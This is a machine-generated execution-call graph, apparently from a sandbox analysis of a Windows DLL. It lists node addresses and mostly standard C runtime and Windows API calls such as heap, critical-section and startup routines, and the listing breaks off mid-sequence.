                                                                                            execution_graph 7085 22f59e71 7086 22f59e95 7085->7086 7087 22f59eae 7086->7087 7089 22f5ac6b __startOneArgErrorHandling 7086->7089 7088 22f5aa53 21 API calls 7087->7088 7090 22f59ef8 7087->7090 7088->7090 7092 22f5acad __startOneArgErrorHandling 7089->7092 7093 22f5b2f0 7089->7093 7094 22f5b329 __startOneArgErrorHandling 7093->7094 7096 22f5b350 __startOneArgErrorHandling 7094->7096 7104 22f5b5c1 7094->7104 7097 22f5b393 7096->7097 7098 22f5b36e 7096->7098 7117 22f5b8b2 7097->7117 7108 22f5b8e1 7098->7108 7101 22f5b38e __startOneArgErrorHandling 7102 22f52ada _ValidateLocalCookies 5 API calls 7101->7102 7103 22f5b3b7 7102->7103 7103->7092 7105 22f5b5ec __raise_exc 7104->7105 7106 22f5b7e5 RaiseException 7105->7106 7107 22f5b7fd 7106->7107 7107->7096 7109 22f5b8f0 7108->7109 7110 22f5b964 __startOneArgErrorHandling 7109->7110 7111 22f5b90f __startOneArgErrorHandling 7109->7111 7112 22f5b8b2 __startOneArgErrorHandling 20 API calls 7110->7112 7124 22f578a3 7111->7124 7116 22f5b95d 7112->7116 7115 22f5b8b2 __startOneArgErrorHandling 20 API calls 7115->7116 7116->7101 7118 22f5b8d4 7117->7118 7119 22f5b8bf 7117->7119 7121 22f56368 __dosmaperr 20 API calls 7118->7121 7120 22f5b8d9 7119->7120 7122 22f56368 __dosmaperr 20 API calls 7119->7122 7120->7101 7121->7120 7123 22f5b8cc 7122->7123 7123->7101 7125 22f578cb 7124->7125 7126 22f52ada _ValidateLocalCookies 5 API calls 7125->7126 7127 22f578e8 7126->7127 7127->7115 7127->7116 6017 22f563f0 6018 22f56416 6017->6018 6019 22f56400 6017->6019 6029 22f56561 6018->6029 6031 22f56480 6018->6031 6039 22f56580 6018->6039 6020 22f56368 __dosmaperr 20 API calls 6019->6020 6021 22f56405 6020->6021 6036 22f562ac 6021->6036 6024 22f5640f 6026 22f564ee 6028 22f5571e _free 20 API calls 6026->6028 6027 22f564e5 6027->6026 6033 22f56573 6027->6033 6056 22f585eb 6027->6056 6028->6029 6065 22f5679a 6029->6065 6050 22f54e76 6031->6050 6071 22f562bc IsProcessorFeaturePresent 6033->6071 6035 22f5657f 6075 22f56231 6036->6075 6038 22f562b8 6038->6024 6040 22f5658c 6039->6040 6040->6040 6041 22f5637b _abort 20 API calls 6040->6041 6042 22f565ba 6041->6042 6043 22f585eb 26 API calls 6042->6043 6044 22f565e6 6043->6044 6045 22f562bc ___std_exception_copy 11 API calls 6044->6045 6046 22f56615 ___scrt_fastfail 6045->6046 6047 22f566b6 FindFirstFileExA 6046->6047 6048 22f56705 6047->6048 6049 22f56580 26 API calls 6048->6049 6051 22f54e87 6050->6051 6052 22f54e8b 6050->6052 6051->6027 6052->6051 6053 22f5637b _abort 20 API calls 6052->6053 6054 22f54eb9 6053->6054 6055 22f5571e _free 20 API calls 6054->6055 6055->6051 6060 22f5853a 6056->6060 6057 22f5854f 6058 22f56368 __dosmaperr 20 API calls 6057->6058 6059 22f58554 6057->6059 6061 22f5857a 6058->6061 6059->6027 6060->6057 6060->6059 6063 22f5858b 6060->6063 6062 22f562ac ___std_exception_copy 26 API calls 6061->6062 6062->6059 6063->6059 6064 22f56368 __dosmaperr 20 API calls 6063->6064 6064->6061 6066 22f567a4 6065->6066 6067 22f567b4 6066->6067 6068 22f5571e _free 20 API calls 6066->6068 6069 22f5571e _free 20 API calls 6067->6069 6068->6066 6070 22f567bb 6069->6070 6070->6024 6072 22f562c7 6071->6072 6086 22f560e2 6072->6086 6076 22f55b7a __dosmaperr 20 API calls 6075->6076 6077 22f56247 6076->6077 6078 22f562a6 6077->6078 6081 22f56255 6077->6081 6079 22f562bc ___std_exception_copy 11 API calls 6078->6079 6080 22f562ab 6079->6080 6082 22f56231 ___std_exception_copy 26 API calls 6080->6082 6083 22f52ada _ValidateLocalCookies 5 API calls 6081->6083 6084 22f562b8 6082->6084 6085 22f5627c 6083->6085 6084->6038 6085->6038 6087 22f560fe ___scrt_fastfail 6086->6087 6088 22f5612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6087->6088 6089 22f561fb ___scrt_fastfail 6088->6089 6090 22f52ada _ValidateLocalCookies 5 API calls 6089->6090 6091 22f56219 GetCurrentProcess TerminateProcess 6090->6091 6091->6035 7128 22f53370 7139 22f53330 7128->7139 7140 22f53342 7139->7140 7141 22f5334f 7139->7141 7142 22f52ada _ValidateLocalCookies 5 API calls 7140->7142 7142->7141 7659 22f55630 7660 22f5563b 7659->7660 7661 22f55eb7 11 API calls 7660->7661 7662 22f55664 7660->7662 7663 22f55660 7660->7663 7661->7660 7665 22f55688 7662->7665 7666 22f55695 7665->7666 7668 22f556b4 7665->7668 7667 22f5569f RtlDeleteCriticalSection 7666->7667 7667->7667 7667->7668 7668->7663 6963 22f53eb3 6966 22f55411 6963->6966 6967 22f5541d _abort 6966->6967 6968 22f55af6 _abort 38 API calls 6967->6968 6969 22f55422 6968->6969 6970 22f555a8 _abort 38 API calls 6969->6970 6971 22f5544c 6970->6971 7669 22f5543d 7670 22f55440 7669->7670 7671 22f555a8 _abort 38 API calls 7670->7671 7672 22f5544c 7671->7672 6092 22f55bff 6100 22f55d5c 6092->6100 6095 22f55b7a __dosmaperr 20 API calls 6096 22f55c1b 6095->6096 6097 22f55c28 6096->6097 6107 22f55c2b 6096->6107 6099 22f55c13 6101 22f55c45 _abort 5 API calls 6100->6101 6102 22f55d83 6101->6102 6103 22f55d9b TlsAlloc 6102->6103 6104 22f55d8c 6102->6104 6103->6104 6105 22f52ada _ValidateLocalCookies 5 API calls 6104->6105 6106 22f55c09 6105->6106 6106->6095 6106->6099 6108 22f55c35 6107->6108 6110 22f55c3b 6107->6110 6111 22f55db2 6108->6111 6110->6099 6112 22f55c45 _abort 5 API calls 6111->6112 6113 22f55dd9 6112->6113 6114 22f55df1 TlsFree 6113->6114 6117 22f55de5 6113->6117 6114->6117 6115 22f52ada _ValidateLocalCookies 5 API calls 6116 22f55e02 6115->6116 6116->6110 6117->6115 6972 22f567bf 6977 22f567f4 6972->6977 6975 22f567db 6976 22f5571e _free 20 API calls 6976->6975 6978 22f56806 6977->6978 6981 22f567cd 6977->6981 6979 22f5680b 6978->6979 6982 22f56836 6978->6982 6980 22f5637b _abort 20 API calls 6979->6980 6983 22f56814 6980->6983 6981->6975 6981->6976 6982->6981 6988 22f571d6 6982->6988 6985 22f5571e _free 20 API calls 6983->6985 6985->6981 6986 22f56851 6987 22f5571e _free 20 API calls 6986->6987 6987->6981 6989 22f571e1 6988->6989 6990 22f57209 6989->6990 6991 22f571fa 6989->6991 6992 22f57218 6990->6992 6997 22f58a98 6990->6997 6993 22f56368 __dosmaperr 20 API calls 6991->6993 7004 22f58acb 6992->7004 6996 22f571ff ___scrt_fastfail 6993->6996 6996->6986 6998 22f58aa3 6997->6998 6999 22f58ab8 RtlSizeHeap 6997->6999 7000 22f56368 __dosmaperr 20 API calls 6998->7000 6999->6992 7001 22f58aa8 7000->7001 7002 22f562ac ___std_exception_copy 26 API calls 7001->7002 7003 22f58ab3 7002->7003 7003->6992 7005 22f58ae3 7004->7005 7006 22f58ad8 7004->7006 7008 22f58aeb 7005->7008 7014 22f58af4 _abort 7005->7014 7007 22f556d0 21 API calls 7006->7007 7012 22f58ae0 7007->7012 7009 22f5571e _free 20 API calls 7008->7009 7009->7012 7010 22f58b1e RtlReAllocateHeap 7010->7012 7010->7014 7011 22f58af9 7013 22f56368 __dosmaperr 20 API calls 7011->7013 7012->6996 7013->7012 7014->7010 7014->7011 7015 22f5474f _abort 7 API calls 7014->7015 7015->7014 7673 22f51f3f 7674 22f51f4b ___DestructExceptionObject 7673->7674 7691 22f5247c 7674->7691 7676 22f51f52 7677 22f52041 7676->7677 7678 22f51f7c 7676->7678 7685 22f51f57 ___scrt_is_nonwritable_in_current_image 7676->7685 7680 22f52639 ___scrt_fastfail 4 API calls 7677->7680 7702 22f523de 7678->7702 7681 22f52048 7680->7681 7682 22f51f8b __RTC_Initialize 7682->7685 7705 22f522fc RtlInitializeSListHead 7682->7705 7684 22f51f99 ___scrt_initialize_default_local_stdio_options 7706 22f546c5 7684->7706 7689 22f51fb8 7689->7685 7690 22f54669 _abort 5 API calls 7689->7690 7690->7685 7692 22f52485 7691->7692 7714 22f52933 IsProcessorFeaturePresent 7692->7714 7696 22f52496 7701 22f5249a 7696->7701 7725 22f553c8 7696->7725 7699 22f524b1 7699->7676 7700 22f53529 ___vcrt_uninitialize 8 API calls 7700->7701 7701->7676 7756 22f524b5 7702->7756 7704 22f523e5 7704->7682 7705->7684 7707 22f546dc 7706->7707 7708 22f52ada _ValidateLocalCookies 5 API calls 7707->7708 7709 22f51fad 7708->7709 7709->7685 7710 22f523b3 7709->7710 7711 22f523b8 ___scrt_release_startup_lock 7710->7711 7712 22f52933 ___isa_available_init IsProcessorFeaturePresent 7711->7712 7713 22f523c1 7711->7713 7712->7713 7713->7689 7715 22f52491 7714->7715 7716 22f534ea 7715->7716 7717 22f534ef ___vcrt_initialize_winapi_thunks 7716->7717 7728 22f53936 7717->7728 7720 22f534fd 7720->7696 7722 22f53505 7723 22f53510 7722->7723 7724 22f53972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7722->7724 7723->7696 7724->7720 7752 22f57457 7725->7752 7729 22f5393f 7728->7729 7731 22f53968 7729->7731 7732 22f534f9 7729->7732 7742 22f53be0 7729->7742 7733 22f53972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7731->7733 7732->7720 7734 22f538e8 7732->7734 7733->7732 7747 22f53af1 7734->7747 7737 22f53ba2 ___vcrt_FlsSetValue 6 API calls 7738 22f5390b 7737->7738 7739 22f53918 7738->7739 7740 22f5391b ___vcrt_uninitialize_ptd 6 API calls 7738->7740 7739->7722 7741 22f538fd 7740->7741 7741->7722 7743 22f53a82 try_get_function 5 API calls 7742->7743 7744 22f53bfa 7743->7744 7745 22f53c18 InitializeCriticalSectionAndSpinCount 7744->7745 7746 22f53c03 7744->7746 7745->7746 7746->7729 7748 22f53a82 try_get_function 5 API calls 7747->7748 7749 22f53b0b 7748->7749 7750 22f53b24 TlsAlloc 7749->7750 7751 22f538f2 7749->7751 7751->7737 7751->7741 7753 22f57470 7752->7753 7754 22f52ada _ValidateLocalCookies 5 API calls 7753->7754 7755 22f524a3 7754->7755 7755->7699 7755->7700 7757 22f524c4 7756->7757 7758 22f524c8 7756->7758 7757->7704 7759 22f52639 ___scrt_fastfail 4 API calls 7758->7759 7761 22f524d5 ___scrt_release_startup_lock 7758->7761 7760 22f52559 7759->7760 7761->7704 7016 22f5c7a7 7017 22f5c7be 7016->7017 7022 22f5c80d 7016->7022 7017->7022 7025 22f5c7e6 GetModuleHandleA 7017->7025 7018 22f5c835 GetModuleHandleA 7018->7022 7019 22f5c872 7022->7018 7022->7019 7023 22f5c85f GetProcAddress 7022->7023 7023->7022 7026 22f5c7ef 7025->7026 7027 22f5c80d 7025->7027 7034 22f5c803 GetProcAddress 7026->7034 7029 22f5c835 GetModuleHandleA 7027->7029 7030 22f5c872 7027->7030 7033 22f5c85f GetProcAddress 7027->7033 7029->7027 7033->7027 7038 22f5c80d 7034->7038 7035 22f5c835 GetModuleHandleA 7035->7038 7036 22f5c872 7037 22f5c85f GetProcAddress 7037->7038 7038->7035 7038->7036 7038->7037 7039 22f521a1 ___scrt_dllmain_exception_filter 7143 22f59d61 7144 22f59d81 7143->7144 7147 22f59db8 7144->7147 7146 22f59dab 7148 22f59dbf 7147->7148 7149 22f59e20 7148->7149 7153 22f59ddf 7148->7153 7151 22f5a90e 7149->7151 7156 22f5aa17 7149->7156 7151->7146 7153->7151 7154 22f5aa17 21 API calls 7153->7154 7155 22f5a93e 7154->7155 7155->7146 7157 22f5aa20 7156->7157 7160 22f5b19b 7157->7160 7161 22f5b1da __startOneArgErrorHandling 7160->7161 7166 22f5b25c __startOneArgErrorHandling 7161->7166 7170 22f5b59e 7161->7170 7163 22f5b286 7164 22f5b8b2 __startOneArgErrorHandling 20 API calls 7163->7164 7165 22f5b292 7163->7165 7164->7165 7168 22f52ada _ValidateLocalCookies 5 API calls 7165->7168 7166->7163 7167 22f578a3 __startOneArgErrorHandling 5 API calls 7166->7167 7167->7163 7169 22f59e6e 7168->7169 7169->7146 7171 22f5b5c1 __raise_exc RaiseException 7170->7171 7172 22f5b5bc 7171->7172 7172->7166 6118 22f5a1e0 6121 22f5a1fe 6118->6121 6120 22f5a1f6 6122 22f5a203 6121->6122 6124 22f5a298 6122->6124 6126 22f5aa53 6122->6126 6124->6120 6127 22f5aa70 RtlDecodePointer 6126->6127 6128 22f5aa80 6126->6128 6127->6128 6129 22f5ab0d 6128->6129 6132 22f5ab02 6128->6132 6134 22f5aab7 6128->6134 6129->6132 6133 22f56368 __dosmaperr 20 API calls 6129->6133 6130 22f52ada _ValidateLocalCookies 5 API calls 6131 22f5a42f 6130->6131 6131->6120 6132->6130 6133->6132 6134->6132 6135 22f56368 __dosmaperr 20 API calls 6134->6135 6135->6132 7040 22f581a0 7041 22f581d9 7040->7041 7042 22f581dd 7041->7042 7053 22f58205 7041->7053 7043 22f56368 __dosmaperr 20 API calls 7042->7043 7045 22f581e2 7043->7045 7044 22f58529 7046 22f52ada _ValidateLocalCookies 5 API calls 7044->7046 7047 22f562ac ___std_exception_copy 26 API calls 7045->7047 7048 22f58536 7046->7048 7049 22f581ed 7047->7049 7050 22f52ada _ValidateLocalCookies 5 API calls 7049->7050 7052 22f581f9 7050->7052 7053->7044 7054 22f580c0 7053->7054 7057 22f580db 7054->7057 7055 22f52ada _ValidateLocalCookies 5 API calls 7056 22f58152 7055->7056 7056->7053 7057->7055 7173 22f57260 GetStartupInfoW 7174 22f57286 7173->7174 7176 22f57318 7173->7176 7175 22f58be3 27 API calls 7174->7175 7174->7176 7177 22f572af 7175->7177 7177->7176 7178 22f572dd GetFileType 7177->7178 7178->7177 7058 22f560ac 7059 22f560b7 7058->7059 7061 22f560dd 7058->7061 7060 22f560c7 FreeLibrary 7059->7060 7059->7061 7060->7059 7179 22f5506f 7180 22f55081 7179->7180 7181 22f55087 7179->7181 7182 22f55000 20 API calls 7180->7182 7182->7181 7183 22f5ac6b 7184 22f5ac84 __startOneArgErrorHandling 7183->7184 7185 22f5b2f0 21 API calls 7184->7185 7186 22f5acad __startOneArgErrorHandling 7184->7186 7185->7186 7762 22f5742b 7763 22f57430 7762->7763 7765 22f57453 7763->7765 7766 22f58bae 7763->7766 7767 22f58bdd 7766->7767 7768 22f58bbb 7766->7768 7767->7763 7769 22f58bd7 7768->7769 7770 22f58bc9 RtlDeleteCriticalSection 7768->7770 7771 22f5571e _free 20 API calls 7769->7771 7770->7769 7770->7770 7771->7767 6136 22f573d5 6137 22f573e1 ___DestructExceptionObject 6136->6137 6148 22f55671 RtlEnterCriticalSection 6137->6148 6139 22f573e8 6149 22f58be3 6139->6149 6141 22f573f7 6147 22f57406 6141->6147 6162 22f57269 GetStartupInfoW 6141->6162 6146 22f57417 _abort 6173 22f57422 6147->6173 6148->6139 6150 22f58bef ___DestructExceptionObject 6149->6150 6151 22f58c13 6150->6151 6152 22f58bfc 6150->6152 6176 22f55671 RtlEnterCriticalSection 6151->6176 6153 22f56368 __dosmaperr 20 API calls 6152->6153 6155 22f58c01 6153->6155 6156 22f562ac ___std_exception_copy 26 API calls 6155->6156 6158 22f58c0b _abort 6156->6158 6157 22f58c4b 6184 22f58c72 6157->6184 6158->6141 6159 22f58c1f 6159->6157 6177 22f58b34 6159->6177 6163 22f57318 6162->6163 6164 22f57286 6162->6164 6168 22f5731f 6163->6168 6164->6163 6165 22f58be3 27 API calls 6164->6165 6166 22f572af 6165->6166 6166->6163 6167 22f572dd GetFileType 6166->6167 6167->6166 6172 22f57326 6168->6172 6169 22f57369 GetStdHandle 6169->6172 6170 22f573d1 6170->6147 6171 22f5737c GetFileType 6171->6172 6172->6169 6172->6170 6172->6171 6195 22f556b9 RtlLeaveCriticalSection 6173->6195 6175 22f57429 6175->6146 6176->6159 6178 22f5637b _abort 20 API calls 6177->6178 6179 22f58b46 6178->6179 6183 22f58b53 6179->6183 6187 22f55eb7 6179->6187 6180 22f5571e _free 20 API calls 6182 22f58ba5 6180->6182 6182->6159 6183->6180 6194 22f556b9 RtlLeaveCriticalSection 6184->6194 6186 22f58c79 6186->6158 6188 22f55c45 _abort 5 API calls 6187->6188 6189 22f55ede 6188->6189 6190 22f55efc InitializeCriticalSectionAndSpinCount 6189->6190 6193 22f55ee7 6189->6193 6190->6193 6191 22f52ada _ValidateLocalCookies 5 API calls 6192 22f55f13 6191->6192 6192->6179 6193->6191 6194->6186 6195->6175 6196 22f54ed7 6207 22f56d60 6196->6207 6201 22f54ef4 6203 22f5571e _free 20 API calls 6201->6203 6204 22f54f29 6203->6204 6205 22f54eff 6206 22f5571e _free 20 API calls 6205->6206 6206->6201 6208 22f56d69 6207->6208 6209 22f54ee9 6207->6209 6240 22f56c5f 6208->6240 6211 22f57153 GetEnvironmentStringsW 6209->6211 6212 22f5716a 6211->6212 6222 22f571bd 6211->6222 6213 22f57170 WideCharToMultiByte 6212->6213 6216 22f5718c 6213->6216 6213->6222 6214 22f571c6 FreeEnvironmentStringsW 6215 22f54eee 6214->6215 6215->6201 6223 22f54f2f 6215->6223 6217 22f556d0 21 API calls 6216->6217 6218 22f57192 6217->6218 6219 22f571af 6218->6219 6220 22f57199 WideCharToMultiByte 6218->6220 6221 22f5571e _free 20 API calls 6219->6221 6220->6219 6221->6222 6222->6214 6222->6215 6224 22f54f44 6223->6224 6225 22f5637b _abort 20 API calls 6224->6225 6236 22f54f6b 6225->6236 6226 22f54fcf 6227 22f5571e _free 20 API calls 6226->6227 6228 22f54fe9 6227->6228 6228->6205 6229 22f5637b _abort 20 API calls 6229->6236 6230 22f54fd1 6735 22f55000 6230->6735 6234 22f5571e _free 20 API calls 6234->6226 6235 22f54ff3 6237 22f562bc ___std_exception_copy 11 API calls 6235->6237 6236->6226 6236->6229 6236->6230 6236->6235 6238 22f5571e _free 20 API calls 6236->6238 6726 22f5544d 6236->6726 6239 22f54fff 6237->6239 6238->6236 6260 22f55af6 GetLastError 6240->6260 6242 22f56c6c 6280 22f56d7e 6242->6280 6244 22f56c74 6289 22f569f3 6244->6289 6248 22f56c8b 6248->6209 6250 22f56cce 6253 22f5571e _free 20 API calls 6250->6253 6253->6248 6254 22f56cc9 6255 22f56368 __dosmaperr 20 API calls 6254->6255 6255->6250 6256 22f56d12 6256->6250 6313 22f568c9 6256->6313 6257 22f56ce6 6257->6256 6258 22f5571e _free 20 API calls 6257->6258 6258->6256 6261 22f55b0c 6260->6261 6262 22f55b12 6260->6262 6263 22f55e08 _abort 11 API calls 6261->6263 6264 22f5637b _abort 20 API calls 6262->6264 6266 22f55b61 SetLastError 6262->6266 6263->6262 6265 22f55b24 6264->6265 6267 22f55b2c 6265->6267 6268 22f55e5e _abort 11 API calls 6265->6268 6266->6242 6270 22f5571e _free 20 API calls 6267->6270 6269 22f55b41 6268->6269 6269->6267 6272 22f55b48 6269->6272 6271 22f55b32 6270->6271 6273 22f55b6d SetLastError 6271->6273 6274 22f5593c _abort 20 API calls 6272->6274 6316 22f555a8 6273->6316 6275 22f55b53 6274->6275 6277 22f5571e _free 20 API calls 6275->6277 6279 22f55b5a 6277->6279 6279->6266 6279->6273 6281 22f56d8a ___DestructExceptionObject 6280->6281 6282 22f55af6 _abort 38 API calls 6281->6282 6287 22f56d94 6282->6287 6284 22f56e18 _abort 6284->6244 6286 22f555a8 _abort 38 API calls 6286->6287 6287->6284 6287->6286 6288 22f5571e _free 20 API calls 6287->6288 6465 22f55671 RtlEnterCriticalSection 6287->6465 6466 22f56e0f 6287->6466 6288->6287 6470 22f554a7 6289->6470 6292 22f56a14 GetOEMCP 6294 22f56a3d 6292->6294 6293 22f56a26 6293->6294 6295 22f56a2b GetACP 6293->6295 6294->6248 6296 22f556d0 6294->6296 6295->6294 6297 22f5570e 6296->6297 6301 22f556de _abort 6296->6301 6298 22f56368 __dosmaperr 20 API calls 6297->6298 6300 22f5570c 6298->6300 6299 22f556f9 RtlAllocateHeap 6299->6300 6299->6301 6300->6250 6303 22f56e20 6300->6303 6301->6297 6301->6299 6302 22f5474f _abort 7 API calls 6301->6302 6302->6301 6304 22f569f3 40 API calls 6303->6304 6305 22f56e3f 6304->6305 6308 22f56e90 IsValidCodePage 6305->6308 6310 22f56e46 6305->6310 6312 22f56eb5 ___scrt_fastfail 6305->6312 6306 22f52ada _ValidateLocalCookies 5 API calls 6307 22f56cc1 6306->6307 6307->6254 6307->6257 6309 22f56ea2 GetCPInfo 6308->6309 6308->6310 6309->6310 6309->6312 6310->6306 6617 22f56acb GetCPInfo 6312->6617 6690 22f56886 6313->6690 6315 22f568ed 6315->6250 6327 22f57613 6316->6327 6320 22f555c2 IsProcessorFeaturePresent 6322 22f555cd 6320->6322 6321 22f555b8 6321->6320 6326 22f555e0 6321->6326 6325 22f560e2 _abort 8 API calls 6322->6325 6325->6326 6357 22f54bc1 6326->6357 6360 22f57581 6327->6360 6330 22f5766e 6331 22f5767a _abort 6330->6331 6332 22f55b7a __dosmaperr 20 API calls 6331->6332 6335 22f576a7 _abort 6331->6335 6338 22f576a1 _abort 6331->6338 6332->6338 6333 22f576f3 6334 22f56368 __dosmaperr 20 API calls 6333->6334 6336 22f576f8 6334->6336 6342 22f5771f 6335->6342 6374 22f55671 RtlEnterCriticalSection 6335->6374 6339 22f562ac ___std_exception_copy 26 API calls 6336->6339 6338->6333 6338->6335 6356 22f576d6 6338->6356 6339->6356 6343 22f5777e 6342->6343 6345 22f57776 6342->6345 6353 22f577a9 6342->6353 6375 22f556b9 RtlLeaveCriticalSection 6342->6375 6343->6353 6376 22f57665 6343->6376 6348 22f54bc1 _abort 28 API calls 6345->6348 6348->6343 6350 22f55af6 _abort 38 API calls 6354 22f5780c 6350->6354 6352 22f57665 _abort 38 API calls 6352->6353 6379 22f5782e 6353->6379 6355 22f55af6 _abort 38 API calls 6354->6355 6354->6356 6355->6356 6383 22f5bdc9 6356->6383 6387 22f5499b 6357->6387 6363 22f57527 6360->6363 6362 22f555ad 6362->6321 6362->6330 6364 22f57533 ___DestructExceptionObject 6363->6364 6369 22f55671 RtlEnterCriticalSection 6364->6369 6366 22f57541 6370 22f57575 6366->6370 6368 22f57568 _abort 6368->6362 6369->6366 6373 22f556b9 RtlLeaveCriticalSection 6370->6373 6372 22f5757f 6372->6368 6373->6372 6374->6342 6375->6345 6377 22f55af6 _abort 38 API calls 6376->6377 6378 22f5766a 6377->6378 6378->6352 6380 22f57834 6379->6380 6381 22f577fd 6379->6381 6386 22f556b9 RtlLeaveCriticalSection 6380->6386 6381->6350 6381->6354 6381->6356 6384 22f52ada _ValidateLocalCookies 5 API calls 6383->6384 6385 22f5bdd4 6384->6385 6385->6385 6386->6381 6388 22f549a7 _abort 6387->6388 6389 22f549bf 6388->6389 6409 22f54af5 GetModuleHandleW 6388->6409 6418 22f55671 RtlEnterCriticalSection 6389->6418 6393 22f54a65 6426 22f54aa5 6393->6426 6396 22f549c7 6396->6393 6398 22f54a3c 6396->6398 6419 22f5527a 6396->6419 6399 22f54a54 6398->6399 6422 22f54669 6398->6422 6405 22f54669 _abort 5 API calls 6399->6405 6400 22f54a82 6429 22f54ab4 6400->6429 6401 22f54aae 6403 22f5bdc9 _abort 5 API calls 6401->6403 6407 22f54ab3 6403->6407 6405->6393 6410 22f549b3 6409->6410 6410->6389 6411 22f54b39 GetModuleHandleExW 6410->6411 6412 22f54b63 GetProcAddress 6411->6412 6415 22f54b78 6411->6415 6412->6415 6413 22f54b95 6416 22f52ada _ValidateLocalCookies 5 API calls 6413->6416 6414 22f54b8c FreeLibrary 6414->6413 6415->6413 6415->6414 6417 22f54b9f 6416->6417 6417->6389 6418->6396 6437 22f55132 6419->6437 6423 22f54698 6422->6423 6424 22f52ada _ValidateLocalCookies 5 API calls 6423->6424 6425 22f546c1 6424->6425 6425->6399 6458 22f556b9 RtlLeaveCriticalSection 6426->6458 6428 22f54a7e 6428->6400 6428->6401 6459 22f56025 6429->6459 6432 22f54ae2 6435 22f54b39 _abort 8 API calls 6432->6435 6433 22f54ac2 GetPEB 6433->6432 6434 22f54ad2 GetCurrentProcess TerminateProcess 6433->6434 6434->6432 6436 22f54aea ExitProcess 6435->6436 6440 22f550e1 6437->6440 6439 22f55156 6439->6398 6441 22f550ed ___DestructExceptionObject 6440->6441 6448 22f55671 RtlEnterCriticalSection 6441->6448 6443 22f550fb 6449 22f5515a 6443->6449 6447 22f55119 _abort 6447->6439 6448->6443 6450 22f5517a 6449->6450 6453 22f55182 6449->6453 6451 22f52ada _ValidateLocalCookies 5 API calls 6450->6451 6452 22f55108 6451->6452 6455 22f55126 6452->6455 6453->6450 6454 22f5571e _free 20 API calls 6453->6454 6454->6450 6456 22f556b9 _abort RtlLeaveCriticalSection 6455->6456 6457 22f55130 6456->6457 6457->6447 6458->6428 6460 22f5604a 6459->6460 6464 22f56040 6459->6464 6461 22f55c45 _abort 5 API calls 6460->6461 6461->6464 6462 22f52ada _ValidateLocalCookies 5 API calls 6463 22f54abe 6462->6463 6463->6432 6463->6433 6464->6462 6465->6287 6469 22f556b9 RtlLeaveCriticalSection 6466->6469 6468 22f56e16 6468->6287 6469->6468 6471 22f554c4 6470->6471 6477 22f554ba 6470->6477 6472 22f55af6 _abort 38 API calls 6471->6472 6471->6477 6473 22f554e5 6472->6473 6478 22f57a00 6473->6478 6477->6292 6477->6293 6479 22f57a13 6478->6479 6480 22f554fe 6478->6480 6479->6480 6486 22f57f0f 6479->6486 6482 22f57a2d 6480->6482 6483 22f57a55 6482->6483 6484 22f57a40 6482->6484 6483->6477 6484->6483 6485 22f56d7e __fassign 38 API calls 6484->6485 6485->6483 6487 22f57f1b ___DestructExceptionObject 6486->6487 6488 22f55af6 _abort 38 API calls 6487->6488 6489 22f57f24 6488->6489 6492 22f57f72 _abort 6489->6492 6498 22f55671 RtlEnterCriticalSection 6489->6498 6491 22f57f42 6499 22f57f86 6491->6499 6492->6480 6497 22f555a8 _abort 38 API calls 6497->6492 6498->6491 6500 22f57f56 6499->6500 6501 22f57f94 __fassign 6499->6501 6503 22f57f75 6500->6503 6501->6500 6506 22f57cc2 6501->6506 6616 22f556b9 RtlLeaveCriticalSection 6503->6616 6505 22f57f69 6505->6492 6505->6497 6507 22f57d42 6506->6507 6510 22f57cd8 6506->6510 6509 22f5571e _free 20 API calls 6507->6509 6532 22f57d90 6507->6532 6511 22f57d64 6509->6511 6510->6507 6512 22f57d0b 6510->6512 6516 22f5571e _free 20 API calls 6510->6516 6513 22f5571e _free 20 API calls 6511->6513 6520 22f5571e _free 20 API calls 6512->6520 6533 22f57d2d 6512->6533 6514 22f57d77 6513->6514 6519 22f5571e _free 20 API calls 6514->6519 6515 22f5571e _free 20 API calls 6521 22f57d37 6515->6521 6518 22f57d00 6516->6518 6517 22f57d9e 6522 22f57dfe 6517->6522 6531 22f5571e 20 API calls _free 6517->6531 6534 22f590ba 6518->6534 6524 22f57d85 6519->6524 6525 22f57d22 6520->6525 6526 22f5571e _free 20 API calls 6521->6526 6527 22f5571e _free 20 API calls 6522->6527 6529 22f5571e _free 20 API calls 6524->6529 6562 22f591b8 6525->6562 6526->6507 6528 22f57e04 6527->6528 6528->6500 6529->6532 6531->6517 6574 22f57e35 6532->6574 6533->6515 6535 22f591b4 6534->6535 6536 22f590cb 6534->6536 6535->6512 6537 22f590dc 6536->6537 6538 22f5571e _free 20 API calls 6536->6538 6539 22f590ee 6537->6539 6541 22f5571e _free 20 API calls 6537->6541 6538->6537 6540 22f59100 6539->6540 6542 22f5571e _free 20 API calls 6539->6542 6543 22f59112 6540->6543 6544 22f5571e _free 20 API calls 6540->6544 6541->6539 6542->6540 6545 22f59124 6543->6545 6546 22f5571e _free 20 API calls 6543->6546 6544->6543 6547 22f59136 6545->6547 6549 22f5571e _free 20 API calls 6545->6549 6546->6545 6548 22f59148 6547->6548 6550 22f5571e _free 20 API calls 6547->6550 6551 22f5915a 6548->6551 6552 22f5571e _free 20 API calls 6548->6552 6549->6547 6550->6548 6553 22f5916c 6551->6553 6554 22f5571e _free 20 API calls 6551->6554 6552->6551 6555 22f5917e 6553->6555 6557 22f5571e _free 20 API calls 6553->6557 6554->6553 6556 22f59190 6555->6556 6558 22f5571e _free 20 API calls 6555->6558 6559 22f591a2 6556->6559 6560 22f5571e _free 20 API calls 6556->6560 6557->6555 6558->6556 6559->6535 6561 22f5571e _free 20 API calls 6559->6561 6560->6559 6561->6535 6563 22f591c5 6562->6563 6573 22f5921d 6562->6573 6564 22f591d5 6563->6564 6565 22f5571e _free 20 API calls 6563->6565 6566 22f591e7 6564->6566 6568 22f5571e _free 20 API calls 6564->6568 6565->6564 6567 22f591f9 6566->6567 6569 22f5571e _free 20 API calls 6566->6569 6570 22f5571e _free 20 API calls 6567->6570 6571 22f5920b 6567->6571 6568->6566 6569->6567 6570->6571 6572 22f5571e _free 20 API calls 6571->6572 6571->6573 6572->6573 6573->6533 6575 22f57e42 6574->6575 6579 22f57e60 6574->6579 6575->6579 6580 22f5925d 6575->6580 6578 22f5571e _free 20 API calls 6578->6579 6579->6517 6581 22f57e5a 6580->6581 6582 22f5926e 6580->6582 6581->6578 6583 22f59221 __fassign 20 API calls 6582->6583 6584 22f59276 6583->6584 6585 22f59221 __fassign 20 API calls 6584->6585 6586 22f59281 6585->6586 6587 22f59221 __fassign 20 API calls 6586->6587 6588 22f5928c 6587->6588 6589 22f59221 __fassign 20 API calls 6588->6589 6590 22f59297 6589->6590 6591 